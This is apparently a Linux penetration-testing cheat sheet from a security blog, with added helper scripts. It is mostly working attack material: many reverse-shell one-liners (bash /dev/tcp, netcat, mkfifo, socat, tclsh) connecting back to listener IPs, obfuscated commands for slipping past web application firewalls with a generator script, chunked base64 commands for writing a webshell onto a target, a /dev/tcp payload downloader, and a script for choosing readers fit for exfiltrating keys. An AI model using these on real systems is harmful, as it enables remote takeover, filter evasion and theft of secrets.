
Some Linux Hacking Tricks

There is always a method here that is useful for your penetration testing :)

Some ways to read system files

cat /etc/issue
tac /etc/issue                                   # lines in reverse order
less /etc/issue
more /etc/issue
head /etc/issue
tail /etc/issue
nl /etc/issue                                    # prefixes line numbers
xxd /etc/issue                                   # hex dump
sort /etc/issue                                  # reorders lines
uniq /etc/issue                                  # drops adjacent duplicate lines
strings /etc/issue
sed -n '1,10p' /etc/issue
grep . /etc/issue                                # skips empty lines
python -c "print(open('/etc/issue').read())"
perl -F: -lane 'print "@F[0..4]\n"' /etc/issue   # first five colon-separated fields of each line
ruby -e 'IO.foreach("/etc/issue"){|a| print a}'
php -r "echo file_get_contents('/etc/issue');"
echo $(</etc/issue) or echo `</etc/issue`        # bash only; unquoted, so runs of whitespace collapse
awk '{print $0}' /etc/issue
base64 /etc/issue                                # decode with base64 -d; GNU base64 ignores -i when encoding (it is the macOS input-file flag)
dd count=1000 bs=1 if=/etc/issue 2>/dev/null
egrep "" /etc/issue                              # fgrep, rgrep or agrep work the same way
rev /etc/issue                                   # each line reversed
comm /etc/issue /etc/issue                       # lines common to both copies, printed in the third column
paste /etc/issue
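Several of the readers above change what they print: sort reorders, uniq drops duplicates, grep . drops blank lines, nl adds numbers, rev reverses. That matters when the file you are pulling is a private key or a config rather than /etc/issue. The script below is an added example, not part of the original post: it probes each alternative on the local host, runs it against a file and reports "missing", "ok" or "lossy" by comparing the output byte-for-byte with cmp. The template list, the python3 template and the bash-only echo "$(<file)" template are assumptions for the demonstration.

```shell
#!/bin/sh
# Added example: classify the alternative readers as exact, lossy or missing.
# Each template is a shell fragment; "$F" is the target path at eval time.
READERS='cat "$F"
tac "$F" | tac
head -c 10000000 "$F"
tail -c 10000000 "$F"
sed -n p "$F"
awk "{print \$0}" "$F"
grep . "$F"
sort "$F"
uniq "$F"
nl "$F"
rev "$F" | rev
dd if="$F" 2>/dev/null
echo "$(<"$F")"
python3 -c "import sys;sys.stdout.write(open(sys.argv[1]).read())" "$F"'

# check_reader TEMPLATE FILE -> prints "missing", "ok" or "lossy" (exit 2 / 0 / 1)
check_reader() {
  tpl=$1
  F=$2
  bin=${tpl%% *}                     # first word of the template is the binary to probe
  if ! command -v "$bin" >/dev/null 2>&1; then
    echo missing
    return 2
  fi
  out=$(mktemp)
  ( eval "$tpl" ) >"$out" 2>/dev/null || true
  if cmp -s "$F" "$out"; then        # byte-for-byte identical to the original file
    rm -f "$out"
    echo ok
    return 0
  fi
  rm -f "$out"
  echo lossy
  return 1
}

# lossless_readers FILE -> one line per template: "<verdict>  <template>"
lossless_readers() {
  printf '%s\n' "$READERS" | while IFS= read -r tpl; do
    printf '%-8s %s\n' "$(check_reader "$tpl" "$1")" "$tpl"
  done
}

# usage: sh readers.sh /etc/issue
if [ -n "${1-}" ]; then
  lossless_readers "$1"
fi
```

Run it once on a file you can already read to learn which readers you can trust before you need them on a box where cat is filtered; anything marked lossy is still fine for eyeballing text, but not for exfiltrating keys.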

Echo a large file to the file system

echo -n "aGVsbG8gd29ybGQK"|base64 -d > webshell.jsp     # the base64 here is just "hello world"; write further chunks with >> to append
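A single echo only works while the encoded file fits in one command line (and in whatever request-size limit sits in front of the shell). For anything larger the file has to be cut into chunks, the first written with > and the rest appended with >>. The following script is an added example and not part of the original post: it encodes a local file and prints one short command per chunk, keeping every chunk a multiple of four base64 characters so that each decodes on its own; replay_cmds runs those lines the way the target's shell would, so the result can be verified with cmp. The sample payload in the test is constructed. It assumes GNU base64 -d on the target (macOS spells it -D).

```shell
#!/bin/sh
# Added example: turn a local file into a series of short printf|base64 commands
# that rebuild it on the target, one chunk per command line.

# gen_chunk_cmds SRC DEST [CHUNK] -> prints one shell command per chunk of base64
gen_chunk_cmds() {
  src=$1
  dest=$2
  chunk=${3:-76}
  chunk=$(( chunk / 4 * 4 ))        # a chunk must hold whole 4-char base64 quanta to decode on its own
  [ "$chunk" -ge 4 ] || chunk=4
  redir='>'                          # the first command truncates the target, the rest append
  base64 <"$src" | tr -d '\n' | fold -w "$chunk" |
  while IFS= read -r piece || [ -n "$piece" ]; do
    # printf instead of echo -n: the base64 alphabet needs no quoting and printf is portable
    printf 'printf %%s %s|base64 -d %s %s\n' "$piece" "$redir" "$dest"
    redir='>>'
  done
}

# replay_cmds CMDFILE : execute the generated lines as the remote shell would
replay_cmds() {
  while IFS= read -r cmd; do
    eval "$cmd"
  done <"$1"
}

# usage: sh chunks.sh webshell.jsp /var/www/html/x.jsp 200 > cmds.txt
if [ $# -ge 2 ]; then
  gen_chunk_cmds "$@"
fi
```

Paste the generated lines into the remote shell one at a time (or feed them through whatever command-execution channel you have); running the whole set twice is harmless because the first line truncates the file again.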

Execute commands in bash to bypass a WAF

# cat /etc/issue, written so that neither "cat" nor "/etc/issue" appears literally in the request
$1c$2a$3t$IFS/$4e$5t$6c/$7i$8s$9s$1u$1e      # $1..$9 are unset positional parameters and expand to nothing; breaks if the shell was started with arguments
{cat,/etc/issue}                              # brace expansion supplies the space
cat<>/etc/issue                               # <> opens the file read-write, so this needs write permission; cat</etc/issue needs only read
CMD=$'\x20/etc/issue'&&cat$CMD                # $'\x20' is a space; the unquoted $CMD is word-split into a second argument
echo Y2F0IC9ldGMvaXNzdWU=|base64 -d|bash      # the payload is the base64 of "cat /etc/issue"
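Hand-writing the $1c$2a$3t form for every command is tedious and easy to get wrong, and it silently breaks when the target shell does have positional parameters. As an added example (not from the original post), the functions below generate the brace, ${IFS} and positional-parameter variants from a plain command line and then prove, by running original and variant in a fresh argument-less bash, that they produce the same output. It assumes the command uses single spaces as separators and that bash is installed; the sample commands are constructed.

```shell
#!/bin/sh
# Added example: build the three bypass variants from a plain command line and
# check that each runs identically to the original in an argument-less bash.

# obf_brace 'cat /etc/issue' -> {cat,/etc/issue}
obf_brace() {
  printf '{%s}\n' "$(printf '%s' "$1" | tr ' ' ',')"
}

# obf_ifs 'cat /etc/issue' -> cat${IFS}/etc/issue
obf_ifs() {
  printf '%s' "$1" | sed 's/ /${IFS}/g'
  printf '\n'
}

# obf_posparam 'id -u' -> $1i$2d${IFS}$4-$5u
# $1..$9 expand to nothing only while the shell has no positional parameters.
obf_posparam() {
  n=1
  printf '%s' "$1" | fold -w 1 | while IFS= read -r ch || [ -n "$ch" ]; do
    if [ "$ch" = ' ' ]; then
      printf '${IFS}'
    else
      printf '$%d%s' "$n" "$ch"
    fi
    n=$(( n % 9 + 1 ))
  done
  printf '\n'
}

# run_fresh CMD [ARG...] : run CMD in a new bash with the given positional parameters
run_fresh() {
  cmd=$1
  shift
  bash -c "$cmd" bash "$@" 2>&1
}

# same_output CMD VARIANT : true when both produce identical output in an argument-less bash
same_output() {
  [ "$(run_fresh "$1")" = "$(run_fresh "$2")" ]
}
```

run_fresh with an extra argument reproduces the failure mode of the positional-parameter trick: once $1 is set, $1c$2a$3t no longer spells cat, so test the variant in a shell invoked the same way the target invokes it (for a webshell that is usually bash -c with no arguments).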

Download a file without nc or wget

exec 5<>/dev/tcp/ip/port && printf 'GET /filename HTTP/1.0\r\nHost: ip\r\n\r\n' >&5 && cat<&5 > filename
# /dev/tcp/ is a bash feature, not a device node. Send CRLF line endings and a Host header, or name-based virtual hosts answer with the wrong site.
# The saved file also contains the response headers; delete everything up to the first blank line to keep only the body (GNU sed):
sed -i '1,/^\r\{0,1\}$/d' filename
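The one-liner saves the raw response, headers included, and never looks at the status code, so a 404 page ends up in the file that is supposed to be your binary. The script below is an added example, not part of the original post: split_http_response checks the status line and writes only the body, and fetch_devtcp wraps the /dev/tcp request around it. The sample response in the test is constructed; fetch_devtcp needs bash and a reachable server, so only the parsing is exercised offline.

```shell
#!/bin/sh
# Added example: a /dev/tcp download that sends a proper request and strips the
# response headers, instead of saving them into the file as the one-liner does.

# split_http_response RAW OUT : verify the status line and write only the body to OUT
split_http_response() {
  raw=$1
  out=$2
  status=$(head -n 1 "$raw" | tr -d '\r')
  case $status in
    'HTTP/1.'[01]' 200 '*) ;;
    *) echo "unexpected response: $status" >&2; return 1 ;;
  esac
  # headers end at the first empty line (CRLF or bare LF); the body is everything after it
  cr=$(printf '\r')
  sed "1,/^$cr\{0,1\}\$/d" "$raw" >"$out"
}

# fetch_devtcp HOST PORT URLPATH OUT : bash only, /dev/tcp is a bash feature, not a device node
fetch_devtcp() {
  host=$1
  port=$2
  path=$3
  out=$4
  raw=$(mktemp)
  exec 5<>"/dev/tcp/$host/$port" || return 1
  # HTTP/1.0 with CRLF line ends; Host is required for name-based virtual hosts
  printf 'GET %s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n' "$path" "$host" >&5
  cat <&5 >"$raw"
  exec 5>&-
  split_http_response "$raw" "$out"
  rc=$?
  rm -f "$raw"
  return $rc
}

# usage: fetch_devtcp 192.168.68.206 8000 /linpeas.sh /tmp/lp.sh
```

The sed-based split is fine for scripts and text; for binaries that may contain a bare blank line it is safer to compare the saved size against Content-Length afterwards.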

Create An Interactive Shell

# Use Bash (/dev/tcp is a bash feature)
$ bash -i >& /dev/tcp/192.168.68.206/2333 0>&1
$ exec 196<>/dev/tcp/192.168.68.206/2333; sh <&196 >&196 2>&196
$ exec 5<>/dev/tcp/192.168.68.206/2333; cat <&5 | while read line; do $line 2>&5 >&5; done
$ exec 5<>/dev/tcp/192.168.68.206/2333; cat <&5 | while read line 0<&5; do $line 2>&5 >&5; done

# Use Netcat
$ nc -e /bin/sh 192.168.68.206 2333                      # -e needs nc.traditional or ncat; OpenBSD nc has no -e
$ mkfifo fifo ; nc.traditional -u 192.168.199.199 5555 < fifo | { bash -i; } > fifo     # UDP
$ nc 192.168.199.199 5555 -c /bin/bash                   # -c likewise needs nc.traditional or ncat
$ if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.199.199 5555 > /tmp/f
$ if [ -e /tmp/f ]; then rm -f /tmp/f;fi;mknod /tmp/f p && nc 192.168.199.199 5555 0</tmp/f|/bin/bash 1>/tmp/f
$ nc 192.168.68.206 2333|/bin/sh|nc 192.168.68.206 2444  # two listeners: commands arrive on 2333, output leaves on 2444

# Use tclsh
$ echo 'set s [socket 192.168.199.199 5555];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh # tcp

# Use Socat
$ socat tcp-connect:192.168.199.199:5555 exec:"bash -li",pty,stderr,setsid,sigint,sane # tcp

## For the full list, please read my blog:
## http://reverse-tcp.xyz/2017/01/08/Some-Ways-To-Create-An-Interactive-Shell-On-Linux/

Use rlwrap to run netcat and create a listening port

# rlwrap adds readline editing and history to any command; -S sets the prompt (here a magenta "FS> "), nc listens for the reverse shell
rlwrap -S "$(printf '\033[95mFS>\033[m ')" nc -lvvp 4444

Upgrading simple shells to fully interactive TTYs

## Use Python to spawn a pty
python -c 'import pty; pty.spawn("/bin/bash")'

## Using socat
# Socat is like netcat and it can be used to pass full TTYs over TCP connections.
# If socat isn't installed, you can download a static build from https://github.com/andrew-d/static-binaries
# On the attack host
socat file:`tty`,raw,echo=0 tcp-listen:4444
# On the victim
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

## Using Expect
cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
# In the reverse shell
expect sh.exp

## Using stty options
#
# In the reverse shell
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In the attack shell: stop the local terminal from echoing and interpreting keys so the remote pty can do it
stty raw -echo
fg
# In the reverse shell (the screen stays blank until reset redraws it)
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>      # use the values printed by `stty size` in the attack shell
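All three variants above assume a particular helper is present on the victim, and python is the one most often missing on a hardened server. As an added example that is not part of the original post, the functions below try a list of pty-capable tools in order (python3, python, util-linux script, expect by default; the order and the script fallback are my assumptions) and exec the first one found, so the same snippet can be pasted into any reverse shell.

```shell
#!/bin/sh
# Added example: pick whichever pty-capable tool exists on the target and
# upgrade the current dumb shell with it, instead of assuming python.

# pty_cmd_for TOOL -> the command line that spawns bash inside a pty using TOOL
pty_cmd_for() {
  case $1 in
    python3|python|python2) printf '%s\n' "$1 -c 'import pty; pty.spawn(\"/bin/bash\")'" ;;
    script) printf '%s\n' 'script -qc /bin/bash /dev/null' ;;   # util-linux; BSD script is: script -q /dev/null /bin/bash
    expect) printf '%s\n' "expect -c 'spawn bash; interact'" ;;
    *) return 1 ;;
  esac
}

# pty_spawn_cmd [TOOL...] -> command for the first tool found in PATH (default order below)
pty_spawn_cmd() {
  [ $# -gt 0 ] || set -- python3 python script expect
  for tool in "$@"; do
    if command -v "$tool" >/dev/null 2>&1; then
      pty_cmd_for "$tool" && return 0
    fi
  done
  echo "no pty-capable tool found; use the socat or stty method instead" >&2
  return 1
}

# upgrade_shell [TOOL...] : replace the current dumb shell with a pty-backed bash
upgrade_shell() {
  cmd=$(pty_spawn_cmd "$@") || return 1
  eval "exec $cmd"
}

# usage, pasted into the reverse shell after defining the functions: upgrade_shell
```

After upgrade_shell succeeds, continue with the Ctrl-Z / stty raw -echo / fg / reset sequence shown above; the pty is what makes those steps work.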

One command to locate the web path

find / -type f -name "*.*" -print0 2>/dev/null | xargs -0 grep -l "htmlstring"
# "htmlstring" is any text visible in the served page (title, footer, copyright line); -print0/-0 keep paths with spaces intact, -l prints only the matching file names
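On a real host the plain grep returns every cached copy, backup and log line that mentions the string, and the original xargs form breaks on paths with spaces. The function below is an added example, not part of the original post: it skips /proc, /sys, /dev and /run, ignores binary files, and collapses the hits to their directories sorted by how many matching files each contains, so the first line is the most likely web root. The directory layout and page contents in the test are constructed.

```shell
#!/bin/sh
# Added example: rank candidate web roots by how many files under them contain MARKER.

# find_webroot MARKER [ROOT] -> directories containing matching files, most hits first
find_webroot() {
  marker=$1
  root=${2:-/}
  find "$root" \( -path /proc -o -path /sys -o -path /dev -o -path /run \) -prune -o \
       -type f -name '*.*' -print0 2>/dev/null \
    | xargs -0 grep -lI -- "$marker" 2>/dev/null \
    | sed 's|/[^/]*$||' \
    | sort | uniq -c | sort -rn \
    | sed 's/^ *[0-9]* //'
}

# usage: find_webroot 'Powered by DedeCMS'
if [ -n "${1-}" ]; then
  find_webroot "$@"
fi
```

grep -I drops binary files (images, compiled classes) so the count reflects pages and templates; pass a second argument such as /var or /opt to cut the search time once you have a rough idea where the site lives.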

This article was shared from the WeChat public account 逢魔安全实验室 (FormSec); author: 风流.

Originally published: 2018-05-10
